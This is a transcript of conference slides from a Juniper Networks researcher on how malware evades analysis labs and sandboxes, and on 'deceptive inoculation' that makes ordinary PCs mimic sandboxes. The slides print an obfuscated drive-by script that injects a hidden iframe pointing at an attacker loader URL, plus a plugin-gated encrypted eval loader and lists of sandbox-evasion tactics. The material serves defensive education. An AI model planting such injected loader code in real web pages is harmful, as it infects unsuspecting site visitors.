Thinking Outside the Sand[box]

Thinking Outside

the[Sand]box

Kyle Adams - Juniper Networks

This presentation is for educational purposes only

Introduction

Chief Software Architect for Junos Web App Secure

“Junos Web App Secure is a security deception technology

designed to lace web applications with honeypots on-the-fly”

More recently, leading efforts in malware research.

Can’t share exactly why,

but I can share some interesting ideas that have surfaced as a result.

Primary Goal

Inoculate your machine from infection by

specific classes of malware

Background

• Malware Analysis Background o Malware Collection Techniques

o Malware Analysis Techniques

o Signature Development

• Malware Authoring ROI o Malware ROI

o Optimizing for Success

o Hypothetical Example

• Evasion o Distribution Evasion

o Sandbox Evasion

Background / Malware Collection

How do analysts get malware samples?

• Web Crawlers

• Torrents

• Usenet

• Malware Repositories

• Email

• Droppers

Background / Malware Analysis

How do malware analysts inspect malware?

• Static File Analysis

• Virtual Machine Sandboxing

• Code Emulation Sandboxing

Background / Signatures

How do malware signatures get created?

1. Get a sample

2. Analyze it for unique behaviors

- Generate heuristic behavior signature

3. Analyze it for unique data patterns -

Generate file data signature

4. Distribute new signatures to customers

5. Remove old unnecessary signatures

Background / Malware ROI

Research Development Testing Distribution

Grow Infection Base

Uninterrupted Lifecycle:

The infection base grows indefinitely. The more machines infected, the

more return the attacker gets for their initial investment.

In other words… Time = Money

Background / Malware ROI

Research Development Testing Distribution

Grow Infection Base

Interrupted Lifecycle:

Sample Collected Sample Detected Signature Published

The infection base grows until a signature is published. It then rapidly

declines in growth rate and eventually becomes negligible. The more

machines infected, the more return the attacker gets for their initial

investment.

So… Time to DETECTION = Money

Background / Optimizing For

Success

Hypothetical Example:

Bob spends 20 hours researching his target environment. Another 20 hours

writing some ransomware and testing it. Finally, Bob pays someone to distribute

his malware for 50 cents per infection, with a distribution rate of 200 clients per

hour.

Bob’s ransom is $300 and 10% of his victims will chose to pay.

So for every hour Bob’s malware is undetected, he makes:

((200 clients * .1) * $300) - (200 clients * $0.50) = $5,900 per hour

Assume the infection rate remains constant for 72 hours, and minus Bob’s time at

(~$50 an hour), Bob makes a total of $422,800.

Background / Optimizing For

Success

Hypothetical Example:

Now assume his malware is detected and a signature is published, dropping the

successful ransom collection rate to 1 client per hour.

(hours_before_detection * ((200 clients * .1) * $300) - (200 clients * $0.50)))

+ (hours_after_detection * (((10 clients * .1) * $300) - (10 clients * $0.50))

Detection at 6 hours: Bob makes $52,870




So for each 6 hours Bob can avoid detection, he makes $30,000 vs. $1,770.

Thats a lot of motivation!

Background / Distribution Evasion

• You can’t analyze something you can’t get.

• You can’t generate signatures if you can’t analyze

So if you can avoid serving malware to analysis labs, you

can avoid detection and signature distribution.

Distribution Evasion

Distribute malware only to a select set of targets, narrow

enough to exclude analysis labs.


Distribution Evasion Tactics:

• Don’t serve to search engines (Google, Yahoo, Bing, etc…)

• Don’t serve to known security lab IPs (Symantec, McAfee, etc…)

• Don’t serve to an environment you can’t infect (Missing Plugins,

Unsupported OS, etc…)

• Randomly choose not to serve

• Serve only to specific countries/IP ranges

• Serve only to known browsers

• Serve only if referer is whitelisted

• Serve only once per IP


Distribution Evasion Implementation:

1. Inject obfuscated drive-by download hook into compromised sites: <script type=”text/javascript”>eval(function(p,a,c,k,e,d){e=function(c){return

c.toString(36)};if(!''.replace(/^/,String)){while(c--

){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return

d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]) {p=p.replace(new

RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('<0 8="7/a">6 2="4://5.9.f";b.g("<3

e=\\"1\\" d=\\"1\\"c=\\""+2+"\\"></3>");</0>',17,17,

'script||ste|iframe|http|www|var|text|type|google|javascript|document|src|height|wi

dth|com|write'.split('|'),0,{}))</script>

Deobfuscated, it looks like this: <script type="text/javascript">

var ste = "http://exmpl.badness.ru/loader.php?key=Ah7Bvv034";

document.write("<iframe width=\"1\" height=\"1\" src=\"" + ste +

"\"></iframe>");

</script>

But this does nothing to stop automated crawlers in a research lab.



2. Add client-side specificity:The malware requires a specific version of

flash to exploit a client, so the drive-by code can actually hide itself unless

you have that version of flash. <script type="text/javascript">

… encryption/decryption code …

eval(decrypt("4f534514404652100c1016594d43460b1e1b54415844591750515d585d414a1d4b471

8585c535355431e445949085d54480970510276434f02030d14035656504c5f525a471c404258445119

1b0b5f5743555c5c15435c5d4658046a1a036511195a525d545a430d6d12056d1b17454352096d1b171

41e1941445c1613121b6f1b0c0b1b5a5445515c550a13100c", navigator.plugins['Shockwave

Flash'].version));

</script>

Now if the lab isn’t using flash version 12.0.0.44, the drive-by iframe will not

be injected.



3. Add server-side specificity and filtering:The iframe points to a server

whose sole purpose is to exploit browsers and serve malware. In addition

to picking the right exploit for the target client, it will also not serve malware

if specific conditions are not met.

• You’re not a search engine

• Your IP is not blacklisted, or is in a whitelist

• You’re using an exploitable OS and browser

• This is the first time you have loaded the iframe

• Drive by code has been injected into the domain of your referer

Since the research lab doesn't know what conditions the distribution server

requires, it is exceptionally difficult to trick it into serving the malware.

Background / Sandbox Evasion

Sandbox Evasion Tactics: If any of the following are true, do not execute the malware payload:

• Significant Clock Skew

• Debugger is attached

• Virtual Machine Detected

• No Internet Connection

• Unexploitable environment

• Sandbox Software Detected

• Sleep statements abort prematurely

Sandboxes can only run for a fixed period of time per sample (usually 30-60

seconds), so the malware may try to run longer:

• Long sleep before payload execution

• Schedule payload execution for some time in the future

• Require a system reboot, or several reboots


Sandbox evasion techniques can be grouped

into several high level categories:

• Specificity

• Triggers

• Detection

• Interruption

• Dialogs

Any given malware sample may do zero or more of these.


Specificity:

• Has internet connection

• Has correct software versions

• Has correct OS

• Has expected security policies

• Public IP is in correct geographical region

• Clock skew is minimal

• Account data is present (Gmail, AIM, Facebook, etc…)


Specificity:

Requires Email Handing app like Outlook or ThunderBird. Requires .NET

framework

Requires Internet Connection Requires Win 95/98


Triggers:

• Sleep for several minutes

• Require multiple executions

• Wait for one or more reboots

• Wait for event

o User opens .txt file

o User launches browser

o User switches to battery power

o User updates windows

o User installs software

o User connects to WiFi

o HID activity (Mouse, Keyboard, Webcam, Mic)


Triggers:

Requires browser restart to

trigger payload.

Require a second

execution.


Detection:

• Debugger Hooks

• Virtual Machines

o Registry Keys, Serial Numbers, MAC addresses

o Processes, Services, Drivers, Open Ports

o VM Specific ASM instructions

• Sandbox Software

o Open Ports, Processes, Files


Detection:

Themida:

Legitimate Software Piracy

Protection wrapper designed

to detect VM’s and

debuggers. Go figure,

malware authors use it too.

Debugger detection. And

hey, they even explained

how to turn off SoftIce (just in

case you didn’t know how).

No

Printer?


Interruption:

• Analysis Framework Interruption:

o Force Reboot or Logout

o Enable Firewall / Whitelist C&C servers

• Screen Capture Interruption

o Open dialogs minimized

o Open other apps Maximized

o Flashing components / Animation

o Hidden MouseOver components


Interruption:

Force a reboot.

Screen Shot Evasion:

The “Play” button

flashes. We got lucky

and took the

screenshot at the right

time.


Dialogs:


Simple Dialogs:

• What are they? o Fake Apps

o Fake Installers

o Fake Errors

• Why? o Prevent sandbox analysis

o Phish for information

o Legitimize

it looks real, so its probably safe

red flags (UAC, firewall notices, etc…)


Simple Dialogs:

Legitimize UAC dialogs

Require basic human input (click a button)


Advanced Dialogs:

• Require account details

• TOS acceptance

• Combination Lock

• Graphic based dialogs


Advanced Dialogs:

Requires password. Presumably

available with the download link.

Fake dialog. This dialog looks similar

to the default theme of XP, but is

clearly not.

Captcha style dialog

Deceptive Inoculation

Bottom line, malware takes great care not to

run in a sandbox environment.

Lets all be sandboxes! (or at least pretend to be)

Deceptive Inoculation

• Distribution Deception o Prevent your personal computer from being sent

malware in the first place (stop drive-by-downloads).

• Sandbox Deception o Prevent malware from executing a payload when

launched on your personal computer.

Inoculation / Distribution Evasion

Pretend you’re google bot:

1. Firefox: Install User-Agent-Switcher

2. Set User-Agent to: Googlebot-Image (Googlebot)

Pretend none of your plugins are enabled:

1. Firefox: Go to Tools > Add Ons

2. For everything in the list, select “Ask To Activate”

(Java, Adobe Acrobat, Flash, Silverlight, Office, PDF Reader, ...)

Disable Referers:

1. Firefox: Go to about:config

2. Set “network.http.sendRefererHeader” to 0

Inoculation / Distribution Evasion

Request Suspicious Content Twice:

This doesn’t exist yet, but what if….

iframe: badsite.com

I

F

R

A

M

E

V

A

L

I

D

A

T

O

R

embedded flash

repeat: badsite.com

no embedded flash

IFRAME iframe: goodsite.com

no embedded flash

Bad

Server

Good

Server

Inoculation / Sandbox Evasion

Permanent Debugger

1. Install a debugger

2. Hook every process automatically

Spoof VMWare Artifacts:

1. Create stub exe called “VBoxService.exe” and leave it running on boot.

Skew your clock

1. Change system time to be 1 year behind

2. Disable clock syncing

Inoculation / Sandbox Evasion

Sandbox Emulation

1. Open ports (cuckoo: 2042, mongodb: 27017)

2. Configure as Cuckoo Guest:

http://docs.cuckoosandbox.org/en/latest/installation/guest/ But make sure to

cripple the agent!

These changes may result in instability to the system, and would require

some additional testing in a well used desktop environment.

1. Add a dll named “dbghelp.dll” to registry so it loads into every process

2. Temporarily Assign windows product ID of “76487-337-8429955-22614”

(Assign on boot, revert on shutdown)

Look into Anubis, JoeBox, CWSandBox, ThreatExpert, and Cuckoo. The

more artifacts you can create for these sandboxes, the better the results.

http://docs.cuckoosandbox.org/en/latest/installation/guest/

Conclusion

Practicality:

As it stands, these techniques require some complex

administrative/programming tasks, and would need to be

updated regularly.

Ideally these types of techniques could be packaged into

software that automatically updates and manages

settings for you.

Conclusion

Perceived Efficacy:

With just these 5 strategies, we were able to prevent 20%

of malware activity in the samples we analyzed.

True Efficacy:

Hard to say how effective it really is, because the samples

this works on, are less likely to be identified as known

malware.

Fortunately, this means it will reduce malware infection for samples your AV

is unlikely to detect with signatures.

More Information

Contact Info: Email: [email protected]

Twitter: kadams_sec

LinkedIn: https://www.linkedin.com/in/adamsk

Presentation Material: http://forums.juniper.net/t5/Security-Mobility-Now/bg-p/networkingnow

References: http://www.fireeye.com/blog/technical/malware-research/2011/01/the-dead-giveaways-of-vm-aware-

malware.html

mailto:[email protected]

https://www.linkedin.com/in/adamsk

http://forums.juniper.net/t5/Security-Mobility-Now/bg-p/networkingnow







http://www.fireeye.com/blog/technical/malware-research/2011/01/the-dead-giveaways-of-vm-aware-malware.html















Thinking Outside the Sand[box]

Technology

Transcript of Thinking Outside the Sand[box]